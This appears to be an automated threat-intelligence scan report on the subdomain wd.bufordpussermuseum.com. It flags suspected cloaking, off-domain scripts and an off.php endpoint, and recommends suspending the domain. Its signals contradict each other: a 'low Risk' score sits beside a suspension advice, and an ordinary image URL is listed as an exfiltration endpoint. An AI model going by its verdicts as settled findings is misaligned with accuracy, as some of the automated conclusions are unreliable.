0/100

low Risk

wd.bufordpussermuseum.com

https://wd.bufordpussermuseum.com/

104.18.0.43 · Cloudflare, Inc.

Location

Toronto, Canada

Domain Age

7352 days

HTTP

200 · 67.6s

SSL

Valid· E7, Let's Encrypt, US

Status

COMPLETED

Visual Evidence

Zoom

Title: "wd.bufordpussermuseum.com"

Save

Registered-domain escalation

Submit bufordpussermuseum.com as the primary IOC, enriched with evidence from hostile subdomains like wd.bufordpussermuseum.com.

KB/IOK Matches (0)—

No KB/IOK detections were recorded for this scan.

bufordpussermuseum.com

Unknown

museum | other · 6/3/2026

Summary

The page at wd.bufordpussermuseum.com displays branding elements and assets not matching the official Buford Pusser Museum domain. Network and HTML evidence show off-domain script loading from mama.atarhaber.com and external assets, with SPA-like behavior and no static login forms present. Visual cues in the screenshot suggest a generic promotional UI with Turkish language and unrelated branding, but there is strong indication of cloaking/credential-capture behavior via off.php and dynamic form rendering, raising impersonation concerns rather than confirmed first-party use. Analyst flagged likely cloaking/evasion behavior for this target. Analyst context noted: Analyst note: this target may cloak content or block scanners.

Evidence Summary

▸Observed 3 capture stage(s); canonical stage is late_render_3s.

▸Off-domain submission or API endpoints observed: https://cdn3d.iconscout.com/3d/free/thumb/free-telegram-3d-icon-png-download-7516821.png.

▸Distinctive asset clues: off.php, react-vendor-B4gRMC9K.js, index-BsPf_94V.css, css2, win-3d-icon-png-download-10648812.png, bonus-3d-icon-png-download-6715438.png.

Capture

Stages: 3

Canonical: Late Render (+3s)

Changed: No

Credential Signals

Forms: 0

Password fields: 0

Late-stage login UI: No

Resource Signals

Resources: 21

Hosts: 7

Domains: 7

Suspicious Endpoints

hxxps://cdn3d[.]iconscout[.]com/3d/free/thumb/free-telegram-3d-icon-png-download-7516821.png

Off-Domain Posts

hxxps://cdn3d[.]iconscout[.]com/3d/free/thumb/free-telegram-3d-icon-png-download-7516821.png

Attack Techniques (1)

Suspicious API/endpoint activity observed (off.php, data.php call) indicating possible data exfiltration routes

Indicators of Compromise (0)

No specific IOCs identified in source

Risk AssessmentUsed in abuse reports

The page is hosted under a subdomain (wd.bufordpussermuseum.com) using Cloudflare and a recent Let's Encrypt SSL cert, but the scan evidence strongly suggests cloaking and potential credential capture behavior. Off-domain scripts and assets loaded from mama.atarhaber.com, including an off.php endpoint, indicate possible data exfiltration or redirection. The SPA-like structure with no static login fields but suspected dynamic credential UI warrants caution. Given the impersonation signals and off-domain resources, action is warranted for further abuse investigation and domain/hosting review. Analyst-reported cloaking/evasion suspicion increases confidence that the operator is actively attempting to evade automated security analysis. Analyst context was provided and corroborated during this assessment (Analyst note: this target may cloak content or block scanners.).

Recommended Action

Suspend Domain

Cross-Reference8

URL Intelligence